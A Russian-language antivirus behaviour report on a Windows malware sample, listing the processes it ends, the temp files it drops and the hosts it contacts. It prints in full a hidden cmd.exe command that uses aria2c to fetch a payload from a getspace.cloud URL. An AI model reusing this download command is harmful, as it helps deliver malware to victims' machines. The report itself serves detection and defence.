Техническая информация
Вредоносные функции
Завершает или пытается завершить
следующие системные процессы:
- <SYSTEM32>\cmd.exe
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\7zipsfx.000\aria2c.exe
- %TEMP%\7zipsfx.000\ttl_6.exe
- %WINDIR%\temp\cab51c7.tmp
- %WINDIR%\temp\tar51c8.tmp
- %TEMP%\7zipsfx.000\602.wcs.aria2__temp
- %TEMP%\7zipsfx.000\602.wcs
- %TEMP%\7zipsfx.000\data.bin
Удаляет следующие файлы
- %WINDIR%\temp\cab51c7.tmp
- %WINDIR%\temp\tar51c8.tmp
- %TEMP%\7zipsfx.000\602.wcs.aria2
- %TEMP%\7zipsfx.000\602.wcs
Перемещает следующие файлы
- %TEMP%\7zipsfx.000\602.wcs.aria2__temp в %TEMP%\7zipsfx.000\602.wcs.aria2
Сетевая активность
Подключается к
- 'ge###ace.cloud':443
- 'r3.#.lencr.org':80
- 'microsoft.com':80
TCP
Другие
- 'ge###ace.cloud':443
UDP
- DNS ASK ge###ace.cloud
- DNS ASK r3.#.lencr.org
- DNS ASK microsoft.com
Другое
Создает и запускает на исполнение
- '%TEMP%\7zipsfx.000\ttl_6.exe'
- '%TEMP%\7zipsfx.000\aria2c.exe' -c "https://getspace.cloud/cloud/s/fNzjyzaoNCfJABo/download?path=/&files=602.wcs"
- '<SYSTEM32>\cmd.exe' /c mode con lines=4 cols=60 & color e & %TEMP%\7ZipSfx.000\aria2c.exe -c "https://getspace.cloud/cloud/s/fNzjyzaoNCfJABo/download?path=/&files=602.wcs"' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c mode con lines=4 cols=60 & color e & %TEMP%\7ZipSfx.000\aria2c.exe -c "https://getspace.cloud/cloud/s/fNzjyzaoNCfJABo/download?path=/&files=602.wcs"
- '<SYSTEM32>\mode.com' con lines=4 cols=60
